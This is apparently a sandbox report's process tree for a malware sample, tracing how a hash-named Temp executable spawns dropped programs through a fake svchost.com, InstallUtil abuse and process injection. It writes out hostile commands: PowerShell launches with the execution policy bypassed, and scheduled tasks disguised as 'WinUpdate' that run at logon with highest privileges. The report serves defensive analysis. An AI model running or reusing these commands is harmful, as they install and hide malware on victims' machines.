C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1384

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1536
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2120

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2180

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2312

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2556

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2940

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:724

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3292
- C:\Users\Admin\AppData\Local\Temp\cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe
  "C:\Users\Admin\AppData\Local\Temp\cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2064
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ipconfig /release
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3716
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /release
      4⤵
      System Location Discovery: System Language Discovery
      Gathers network information
      PID:2372
- - C:\Users\Admin\AppData\Local\Temp\adns.exe
    "C:\Users\Admin\AppData\Local\Temp\adns.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2036
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /release
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2904
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        5⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:2428
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3040
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\iyrven.exe"' & exit
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1912
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\iyrven.exe"' & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\iyrven.exe"'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4304
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\iyrven.exe"
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\iyrven.exe
        
        C:\Users\Admin\AppData\Local\Temp\iyrven.exe
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2036
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c ipconfig /release
        10⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ipconfig /release
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5052
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        12⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:3452
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:3444
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:4080
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:4440
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:1792
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:2256
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:3096
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:2264
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:1496
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:3188
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        10⤵
        
        PID:4396
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c ipconfig /renew
        10⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2972
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ipconfig /renew
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:1952
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        12⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:4620
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /renew
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3452
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        5⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:3616
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:868
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\xuolte.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1512
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\xuolte.exe"'
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:656
      - C:\Users\Admin\AppData\Local\Temp\xuolte.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xuolte.exe"
        6⤵
        Executes dropped EXE
        Modifies system executable filetype association
        Drops file in Program Files directory
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\xuolte.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3582-490\xuolte.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\Install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3568
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\$77SVC~1.EXE"
        8⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\$77SVC~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\$77SVC~1.EXE
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4196
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WinUpdate" /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"' & exit
        10⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3576
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn WinUpdate /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"' & exit
        11⤵
        
        PID:1012
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn WinUpdate /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"'
        12⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp17E8.tmp.bat""
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4412
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        11⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2372
        
        C:\Users\Admin\AppData\Roaming\WinUpdate.exe
        
        "C:\Users\Admin\AppData\Roaming\WinUpdate.exe"
        11⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4884
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\WINUPD~1.EXE"
        12⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:332
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\WINUPD~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\WINUPD~1.EXE
        13⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2076
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WinUpdate" /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"' & exit
        14⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn WinUpdate /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"' & exit
        15⤵
        System Location Discovery: System Language Discovery
        
        PID:2032
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn WinUpdate /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"'
        16⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4F25.tmp.bat""
        14⤵
        System Location Discovery: System Language Discovery
        
        PID:5020
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        15⤵
        Delays execution with timeout.exe
        
        PID:1856
        
        C:\Users\Admin\AppData\Roaming\WinUpdate.exe
        
        "C:\Users\Admin\AppData\Roaming\WinUpdate.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2008
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dqplkd.exe"' & exit
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:2844
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dqplkd.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:452
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dqplkd.exe"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4104
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\dqplkd.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\dqplkd.exe
        
        C:\Users\Admin\AppData\Local\Temp\dqplkd.exe
        8⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77pop2" /tr '"C:\Users\Admin\AppData\Roaming\$77pop2.exe"' & exit
        9⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn $77pop2 /tr '"C:\Users\Admin\AppData\Roaming\$77pop2.exe"' & exit
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4864
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn $77pop2 /tr '"C:\Users\Admin\AppData\Roaming\$77pop2.exe"'
        11⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp35C1.tmp.bat""
        9⤵
        
        PID:3576
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        10⤵
        Delays execution with timeout.exe
        
        PID:1104
        
        C:\Users\Admin\AppData\Roaming\$77pop2.exe
        
        "C:\Users\Admin\AppData\Roaming\$77pop2.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3912
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\omiliz.exe"' & exit
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:4904
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\omiliz.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4440
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\omiliz.exe"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1244
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\omiliz.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\omiliz.exe
        
        C:\Users\Admin\AppData\Local\Temp\omiliz.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:2272
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\birgjg.exe"' & exit
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:4852
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\birgjg.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3156
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2000
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\birgjg.exe"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:1092
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\birgjg.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1524
        
        C:\Users\Admin\AppData\Local\Temp\birgjg.exe
        
        C:\Users\Admin\AppData\Local\Temp\birgjg.exe
        8⤵
        Executes dropped EXE
        
        PID:3212
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\eggbgo.exe"' & exit
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4020
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\eggbgo.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:560
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1572
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\eggbgo.exe"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:548
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\eggbgo.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\eggbgo.exe
        
        C:\Users\Admin\AppData\Local\Temp\eggbgo.exe
        8⤵
        Executes dropped EXE
        
        PID:4468
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\irlkvs.exe"' & exit
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:3800
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\irlkvs.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1868
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3988
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\irlkvs.exe"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3532
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\irlkvs.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\irlkvs.exe
        
        C:\Users\Admin\AppData\Local\Temp\irlkvs.exe
        8⤵
        Executes dropped EXE
        
        PID:1596
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\lldmcn.exe"' & exit
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:5004
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\lldmcn.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4060
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:928
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\lldmcn.exe"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:4908
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\lldmcn.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\lldmcn.exe
        
        C:\Users\Admin\AppData\Local\Temp\lldmcn.exe
        8⤵
        Executes dropped EXE
        
        PID:3284
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\epvjxr.exe"' & exit
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:4008
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\epvjxr.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4112
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4416
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\epvjxr.exe"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:4804
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\epvjxr.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\epvjxr.exe
        
        C:\Users\Admin\AppData\Local\Temp\epvjxr.exe
        8⤵
        Executes dropped EXE
        
        PID:2856
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\kzoglp.exe"' & exit
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:3512
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\kzoglp.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2448
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3540
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\kzoglp.exe"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:4976
        
